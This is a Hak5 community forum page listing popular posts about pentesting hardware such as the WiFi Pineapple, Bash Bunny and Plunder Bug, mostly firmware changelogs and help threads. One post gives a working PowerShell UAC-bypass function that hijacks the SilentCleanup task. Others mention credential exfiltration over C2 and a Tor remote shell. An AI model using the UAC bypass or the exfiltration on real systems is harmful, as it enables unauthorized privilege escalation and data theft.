Jump to content


Popular Content

Showing content with the highest reputation since 12/12/2018 in Posts

  1. 7 points
    Hi everyone, We just released firmware version 2.5.x for the WiFi Pineapple, vastly improving the PineAP engine. Expect greater results on your next wireless engagement with this release. Changelog 2.5.4: Recon Fixed an issue where scan times would be invalid in non-Chromium web browsers. Changelog 2.5.3: Clients Fixed an issue where SSIDs would not populate. Filters Add detailed Filters information. Setup Choosing the Filter modes is now required upon Setup. Recon Fixed an issue where, in some cases, probes would not be shown in the Recon dialog. Fixed an issue where some probes were not logged during a Recon scan. Fixed an issue where, in some cases, handshakes would not be captured. Fixed an issue where captured handshakes could not be downloaded if the capture had stopped. Fixed an issue where, in some cases, captured handshakes would have invalid frame lengths. Previous scan dates are now translated to the browsers local time. Fixed a rare issue where Live Scan results would not populate in the Web UI. PineAP Fixed an issue where downloading captured handshakes would not work. Changelog 2.5.2: Recon Fixed an issue where invalid results with BSSID 00:00:00:00:00:00 would be collected. Fixed an issue where changing the band to scan would not update until PineAP was restarted. Fixed a firewall issue preventing Live recon results to populate in the Web UI. Changelog 2.5.1: Misc Fix an issue where "Unsupported Device" would incorrectly show. Changelog 2.5.0: Hak5 Cloud C2 Client Update PineAP Rewrite of PineAP, featuring a multitude of improvements and reliability fixes. Recon Improved reliability of scanning. Add throbber for deauth button. Automatically start scan after enabling PineAP. Remove misleading information message when the user started their first scan. Fixed a rare issue where multiple live Recon processes would start. Misc Reduce amount of Web UI HTTP requests. Fix missing paths on the WiFi Pineapple NANO. Download: Over the air via your WiFi Pineapples webinterface, or at https://downloads.hak5.org. ♥ - The Hak5 Development Team
  2. 3 points
    Hello! We're happy to introduce the 1.0.1 update for the Signal Owl. It introduces some bug fixes and changes on entering Arming Mode to improve the user experience. 1.0.1 Change Log: General Simplified device mode selection. The device now starts in ATTACK mode by default. Enter ARMING mode by pressing the device button at any time while in ATTACK mode. Fixed a bug in USB Storage Mounting, which sometimes would cause payloads and firmeware upgrades to fail. Fixed a bug in the LED helper, which would sometimes prevent payloads from updating the LED. Fixed a network device driver bug and interface misconfiguration caused by some external wireless adapters. Fixed a bug in the device reset button, which made it difficult to perform factory resets. You can grab the update via the Hak5 Download Center and follow the Hak5 Docs Signal Owl Update article to get on the latest version. Cheers, Marc
  3. 3 points
    Hi all - I understand the desire to use the infusions from the WiFi Pineapple Mark V era. As Seb has previously pointed out, unfortunately the older devices are no longer capable of securely downloading these infusions over the air from our infrastructure. That being said, all of the modules/infusions may be manually installed to either local of SD storage with ease. To that effect I have published the following article on docs.hak5.org - https://docs.hak5.org/hc/en-us/articles/360023458173 Happy hacking!
  4. 3 points
    Good luck with that. We're not going to help you hack your girlfriend's iPhone.
  5. 3 points
    function sudo { $command = "powershell -noexit " + $args + ";#"; Set-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Value $command ; schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I; Remove-ItemProperty -Path "HKCU:\Environment" -Name "windir" } Quick function that works like sudo 🙂
  6. 3 points
    It would be awesome if I could manage my wifi pineapples modules/payloads from cloud C2. Obviously this would be true of the other supported devices as well.
  7. 2 points
    Hi all - We're excited to introduce a new bit of kit to the Hak5 arsenal – the Plunder Bug! It's a smart LAN Tap with a new take on Packet Sniffing! This is a bit of kit I've been wanting for myself for quite a long time, as I've never been satisfied with the traditional RJ45 Ethernet-based LAN Taps, and if we were going to make one we'd make it special with the ability to act as not just a tap but a mini-switch and a USB Ethernet adapter all in one. It's sweet and simple with the convenience of USB-C and a very small form-factor while sporting some features you won't find in your typical LAN Taps – like the integrated USB Ethernet adapter (yay, no more mess of cables and dongles!), the ability to make passive captures or active scans (acting sort of like an unmanaged switch), and a companion Android root app that makes it possible to capture packets right from your phone! You can find the device for sale now at https://shop.hak5.org/products/bug The documentation can be found at https://docs.hak5.org/hc/en-us/categories/360001482953-Plunder-Bug And the connection scripts are available in the Hak5 Download Center at https://downloads.hak5.org/ and on our Github at https://github.com/hak5/plunderbug-scripts As for the tech, we've packed in a 10/100 Base-T Fast Ethernet switch with the mirrored traffic heading to the integrated USB Ethernet adapter (ASIX AX88772C chipset) and the whole thing is powered over USB-C with a very low draw around 200-300 mA. INB4 it's compatible with gigabit links in that it'll drop 'em to 100 Mbit. I'll post a video here shortly – stay tuned! Huge props to the ever growing Hak5 dev team and their awesome work putting together these scripts and the killer Android app (more on that soon) and as always thanks again to you guys for being the awesome Hak5 community that you are, for your feedback and contributions and making this place somewhere all hackers belog 🙂
  8. 2 points
    I'm not trying to be vague. I simply don't want to be hold responsible for people bricking their devices. Download/transfer the IPK-file from my repo to your Pineapple. SSH/SCP/wget, whatever works best for you. SSH to the Pineapple and run the command below within the same directory you downloaded/transferred the file to. opkg update ; opkg install sslsplit_0.5.5-1_mips_24kc.ipk -d sd There's no prerequisites, except having an active internet connection on the Pineapple while installing. This is not a part of the official module which you can download on the Pineapple, but you should be able to use the module with this package. When i get time, i'll create a fork of the official Module, so that people not experienced with this stuff can use it to setup everything via the Module GUI.
  9. 2 points
    I'm keeping an eye on things. Already had one warning, any more and gone.
  10. 2 points
    There's ~23 MB free on the root file system and another ~30 MB available in /tmp Cocktail napkin math says with 14 byte hashes you're looking at being able to store some 1.6 million creds, give or take... And of course there's always C2CONNECT && C2EXFIL /tmp/logfile # :)
  11. 2 points
    Hi everyone, We're very happy to announce the release of the 1.6 Firmware for the Bash Bunny. This firmware packs a few new features and bug fixes, as well as support for the Metasploit tools package. Change Log: Fix an issue where APT would not work correctly due to now invalid feeds. Add the Debian Stretch APT feeds. Include Ruby 2.3.3 by default. Update Bunny Extensions to the latest available via GitHub. Include languages for BE, BR, CA-FR, CA, CH, CZ, DE, DK, ES-LA, ES, FI, FR, GB, HR, IT, MX, NO, PT, SE, SI and SK. Add support for the Metasploit Framework tool. Add ATTACKMODE ARMING. You can also find the new Metasploit tools package on the tools forum post. You can update your Bash Bunny to version 1.6 by using the Bash Bunny Updater. Thank you to everyone who tried out the beta test! We're looking forward to seeing feedback from the community :) Cheers, Foxtrot
  12. 2 points
    Please give some context to this or I'll lock it as being too vague and looking a lot like spam.
  13. 2 points
  14. 2 points
    Yes its normal, the red flashing LED is indicating wlan1 is in monitor mode. So will stop flashing when you take wlan1mon out of monitor mode.
  15. 2 points
    The tinfoil is strong with this one.
  16. 2 points
    The BashBunny can do USB-HID (keyboard), USB-serial and USB-ethernet, the packet squirrel can only do network-related attacks. Furthermore, the BashBunny has more local storage, more RAM and more computational power. You should think of the Packet Squirrel more like a LAN Turtle except for being inline ethernet.
  17. 1 point
    If you are using the wall adapter and having these issues I would try a firmware recovery then update. This can be caused by to little of power supplied to the pineapple but seeing that you are using the wall adapter I would tend to look at firmware. If that does nothing I would take a look that the wall adapter is not going bad as well.
  18. 1 point
    You clone it to /sd/modules, AND create a sym-link (shortcut) to "/pineapple/modules/sslsplitdirectory". This will make the module appear in the web interface. This sym-link process is mentioned in the instructions and the tutorial. Don't use the exact directory name i wrote above. 🙂
  19. 1 point
    Data recovery. Maybe somebody can share opinion and experience on recovering deleted data. I hope to successfully clone the cell phone and open it on virtualbox or another emulator. My understanding in data recovery with layman terms. The file is deleted but in the background it's simply a piece of free space now ready to be Rewritten or overwritten. When trying to recover data it's best to shut the machine down when the removal or deletion was done, as soon as possible if the machine is powered off it will prevent overwritten of this data space stored on the hard drive. If I DD clone the HD, I assume I can recover any data left untouched with an emulator and an exact cloan of the cell phone HD partition... i should also be able to boot up this clone.... Any advice? Am i wrong? I don't want to mislead future visitors of this thread.
  20. 1 point
    Any computer will do good for cyber security, it is all about software. A good rule of thumb is: Ram:4Gb Graphics:Pretty much anything (it doesn't have to be able to run crisis 3) Cpu: 2-4 cores (2-3 GHz) Hard-drive:Pretty much any SSD will do If you want a desktop you can just order an old desktop and upgrade the ram if needed. If you want a laptop you should watch this video Edit:Dont forget stickers
  21. 1 point
    Save your time effort and money..........a friend of mine paid for the training and it never arrived.......lots of 'Wait a short while' messages........finally they got the money back. Nothing but agro..........AVOID............you don't need it, you really don't.........Hope this helps.......😈
  22. 1 point
    Hello there, I was thinking about putting my wifi pineapple in my backpack and using it in the go. However two antennas always look out of the bag and that's kinda stupid and gets me unwanted attention. My question now is if it it possible to remove 2 of the antennas and using the wifi pineapple with the other two remaining ones so they don't stick out. I know that for some router you have to leave the antennas connected because otherwise it damages the device but maybe it's different for the wifi pineapple? If not I'll probably end up buying a WiFi pineapple nano.
  23. 1 point
    Of course i meant Rogue. I just mistyped, but obviously you knew what I meant. So have you got any constructive advices?
  24. 1 point
    There's been a bug in mdk4 related to some of the arguments you're providing to mdk4. I updated the tool yesterday, which should fix any issues with it. https://github.com/adde88/openwrt-useful-tools
  25. 1 point
    Any chance Hak5 will do a series on how to detect/spot attacks? Something maybe for the home user? or does anyone know of a channel that is already doing this, at the same level has Hak5. many thanks.
  26. 1 point
    What power source is being used? It is very important that adequate power is supplied to the pineapple. The reason I ask is back when the mark V was mainstream it was a common issue of power sources being used that were not sufficient causing several problems including boot loops on startup. It needs at least a 1 amp source but is recommended to use higher, possibly 2 amp supply.
  27. 1 point
    I use Proxmox VE, works great - supports SPICE and USB passthrough. https://www.proxmox.com/en/proxmox-ve
  28. 1 point
    True. Something like this should work if all you need is power for the tetra: https://www.amazon.com/Gigabit-Splitter-Adapter-802-3at-compliant/dp/B00NH8QSOY
  29. 1 point
    Great response......... It depends on what hat you are wearing.......my hat is white......I can understand that it could be used for illegal activity, but us (legit) 'good guys' see it as a must for our work and obviously our clients. You can use a transmitter and monitor the emergency services, but if you attend a scene and are caught transmitting the information you could be charged. However, that would depend on which country you were in and the laws associated to that place. In essence, use the item legitimately and prove that you were employed to do so (unless you are doing it for/on your own devices/systems) and you should be fine (IMO). Hope this adds to digininja's helpful comments😎
  30. 1 point
    Hey WPA2, I agree that it can stretch the budget, but it depends on why you want it? If it is to be added to your arsenal as part of your business, then I am sure you can recoup the expenditures. If, on the other hand, it is because you want one rather than need one, well, that is a decision that relies on available finances. For me, it is the former, but having tried edutech on several occasions and no joy (not even for a ducky), it is hard to see where else other than HAK5 shop, you can get one from. Sometimes, just sometimes, they do sneak onto ebay or even Amazon, if that helps you at all😎
  31. 1 point
    This a topic for the Pineapple thread. It has been answered multiple times already.
  32. 1 point
    Love the device, very cool. BUT shipping to the UK not so good.
  33. 1 point
    They’re probably smarter than you for using an old flip phone. This is one of those ‘If you have to ask, the answer is no.’ type questions. edit: Shit, they’re probably smarter rhan all of us for using a flip phone.
  34. 1 point
    Yes, it can break things. Sounds like you don't know what the tool does otherwise this would be fairly obvious. Do your research, read what it does and how it works and you should be able to answer your own question.
  35. 1 point
    You're flashing the wrong firmware via the Firmware Recovery mechanism. You need to get the special factory.bin firmware from https://downloads.hak5.org and then follow the instructions at https://docs.hak5.org/hc/en-us/articles/360010471774-Firmware-Recovery.
  36. 1 point
    Update: hey d137 I was exploring my Bunny and decided to follow the steps to give it access to the internet (with ATTACKMODE RNDIS_ETHERNET SERIAL). While I was running that payload I sshed into the OS and mounted the udisk and checked the tools folder; at some point the tools had installed and when I tried QuickCreds it ran without a failure. Hope this helps you as well.
  37. 1 point
    Yeah, "here's an executable you run it." is not a great approach. I have seen a "killswitch" in action deployed en mass. You want to hook the .dll (possibly even replace the windows version of the .dll). By grabbing it at the OS level there is a less noticeable action/reaction to the plugging in of usb devices. If the machine just turns off the port/device then mitigation has occurred. Have windows log the time, users logged into the machine and other details for automated reporting. The "attacker," who could be a disgruntled employee, will think the machine is locked down, or even that his attack was successfully silent.
  38. 1 point
    I think I am onto something.. I have Japanese characters in my wifi names. Maaaybe it just doesn't like to connect to these. Tried to connect to the pineapples own open network and that worked fine with the wlan2 module. Will get around to changing the name today and post any progress.
  39. 1 point
    Teaching the ethics behind cybersecurity is important. If students are going to abuse the device, especially against other students then it would make sense to restrict access to anyone caught abusing the device. While also encouraging the general student body to utilize services such as vpn, perhaps the university can provide a free vpn option for students and faculty. With that said, there are a myriad of legal and cool things that a pineapple can do that are not disruptive. That of course should be the academic focus. Some encouragement through things like hack-a-thons could even improve overall network security. Like a competition to establish a low cost vpn solution for the school. Wifi Nano is a great platform to begin development because it is a type of development environment too. Positives seem to outweigh negatives. Although a pineapple is a threat, an advanced user could easily create such attacks with their own hardware. Why would they need a pineapple, if they are that advanced; they probably know that...
  40. 1 point
    https://nordvpn.com/blog/article-13-nordvpn-meme-contest/ So as you all may or may not know the EU is going to ban memes because of copyright infringements. Obviously that's absolute bs because I think memes are a great part of the internet and a neat way to express yourself. Anyway if you love memes and cybersecurity then I would suggest checking out this contest on reddit for a chance to get a free vpn subscription.
  41. 1 point
    Your best option for help would be the discord channel. The forum is slow yes, but things do get answered eventually
  42. 1 point
    So, I am working on a Intro to Golang workshop for my local hackerspace when I remembered I wanted to try something. I looked up the specs for the BB and seen it uses an Arm process and runs linux. Same as my pis that I cross compile Go code for all the time. Time to try something. So, I made a simple hello world and compiled it for arm5. scped it over to the BB and ssh into it and ran it and there was my hello world. I then may a http server that when I send a Get request, I get hello world back. It worked. All is working so if you want to mess around and start using Golang for your payloads, the command to compile to the correct architecture for the BB is below. Remember if you want to publish your payload here, it cannot be compiled so you will have to publish the source for others to compile themselves. env GOOS=linux GOARCH=arm GOARM=5 go build
  43. 1 point
    Still want to know which income to generate with an empty server ... Would start some easily
  44. 1 point
  45. 1 point
  46. 1 point
    No. https://wiki.archlinux.org/index.php/Software_RAID_and_LVM#RAID_installation
  47. 1 point
    I made a POC of a remote shell for windows accessible via TOR hidden services. This could easily be made into a BashBunny payload. See my project description here: https://www.cron.dk/under-the-radar-remote-shell/ Comments are welcome.
  48. 1 point
    Same issue, i saw the tetra, but without IP ... But it seems that you get "no answer" to your question. Do you find a solution via USB ?
  49. 1 point
    Try the masquerading with your iptables. You might can just masquerade with no interface and it will work like you do with sharing INet with Pineapple and BB through *Nix systems. iptables -A POSTROUTING -t nat -j MASQUERADE I know if I share inet with my pi Zero W I do not need to directly add a iptable to either the pi nor the host machine to nat traffic specifically from one to the other to share inet. I just need to make sure ip forwarding is enabled on the host machine, a default route is present or routes for subnets I want to forward to and masquerading for the nat table is set on the host. Default gateway needs to be on the Pi also pointing to the IP of the host it is connected to. So, I am turning my host machine into a router for the pi. So, you need the ping to look like it came from the PS with masquerade. Without it, I believe it sees it is from that IP of the machine which the machines on the network do not know where that is since their gateway is the router for the network, not the PS that contains the route. This also means you need to be running in a mode that the PS gets its own IP too.
  50. 1 point
    Thanks very much for the explanation. Saved me several more hours of frustration... Bunny Flashed and displaying RED flashing LED so success I think. Much appreciated. MM
  • Create New...